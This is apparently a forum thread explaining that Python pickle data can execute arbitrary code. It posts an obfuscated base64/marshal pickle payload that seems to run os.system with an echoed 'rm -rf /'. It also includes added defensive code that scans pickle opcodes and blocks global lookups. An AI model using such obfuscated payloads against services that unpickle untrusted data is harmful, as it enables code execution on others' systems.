
Shell-code attacks using pickled objects have been around for some time.

A pickle bytestring can execute completely arbitrary code. I have used them in my work.

An easy introduction: https://www2.cs.uic.edu/~s/musings/pickle/

An example:

  payload = b"ctypes\nFunctionType\n(cmarshal\nloads\n(cbase64\nb64decode\n(S'4wAAAAAAAAAAAQAAAAIAAABDAAAAcxYAAABkAWQAbAB9AHwAagFkAoMBAQBkAFMAKQNO6QAAAAD6EGVjaG8gXCMgcm0gLXJmIC8pAtoCb3PaBnN5c3RlbSkBcgMAAACpAHIFAAAA+gc8c3RkaW4+2gdwYXlsb2FkBAAAAHMEAAAAAAEIAQ=='\ntRtRc__builtin__\nglobals\n(tRS''\ntR(tR."
  from pickle import loads; loads(payload) # don't do it...!

(p.s., a matplotlib core dev told me they may move away from their use of pickle for this very reason.)
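
A defensive counterpart to the comment above, added here as an example and not part of the original thread: the payload relies on the GLOBAL (`c`) and REDUCE (`R`) opcodes, so a pickle can be inspected for them without being loaded, and an `Unpickler` subclass can refuse global lookups entirely. The helper names and both sample byte strings are constructed for illustration.

```python
import io
import pickle
import pickletools

# Opcodes that import a name, and opcodes that call or build an object.
IMPORT_OPS = {"GLOBAL", "STACK_GLOBAL", "INST"}
CALL_OPS = {"REDUCE", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}

def scan_pickle(data: bytes) -> dict:
    """List imports and call opcodes by walking the stream; nothing is executed."""
    imports, calls = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in IMPORT_OPS:
            # STACK_GLOBAL takes its names from the stack, so arg is None.
            imports.append(arg if arg is not None else "<from stack>")
        elif opcode.name in CALL_OPS:
            calls.append(opcode.name)
    return {"imports": imports, "calls": calls}

class DataOnlyUnpickler(pickle.Unpickler):
    """Refuses every global lookup, so only plain containers and scalars load."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")

def safe_loads(data: bytes):
    return DataOnlyUnpickler(io.BytesIO(data)).load()

# Constructed samples (not from the thread): a harmless protocol-0 stream that
# calls len('abc') through GLOBAL + REDUCE, and an ordinary data-only pickle.
CONSTRUCTED_CALL = b"cbuiltins\nlen\n(S'abc'\ntR."
DATA_ONLY = pickle.dumps({"a": [1, 2]})

if __name__ == "__main__":
    for label, blob in (("call", CONSTRUCTED_CALL), ("data", DATA_ONLY)):
        print(label, scan_pickle(blob))
        try:
            print("  loaded:", safe_loads(blob))
        except pickle.UnpicklingError as exc:
            print("  rejected:", exc)
```

The scan is a triage aid only; the rejecting `find_class` is what actually prevents a callable from being resolved at load time.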


Python 2.7 didn't have much love to give :-)

  Traceback (most recent call last):
    File "<pyshell#1>", line 1, in <module>
      from pickle import loads; loads(payload) # don't do it...!
    File "...\lib\pickle.py", line 1388, in loads
      return Unpickler(file).load()
    File "...\lib\pickle.py", line 864, in load
      dispatch[key](self)
    File "...\lib\pickle.py", line 1139, in load_reduce
      value = func(*args)
  ValueError: bad marshal data (unknown type code)


Python 3 uses a new pickling format (protocol) by default. That doesn't mean Python 2 isn't vulnerable.


I just left a tongue-in-cheek comment and you just killed it with a dry reply :( Yes, I'm well aware...


Sorry! :)

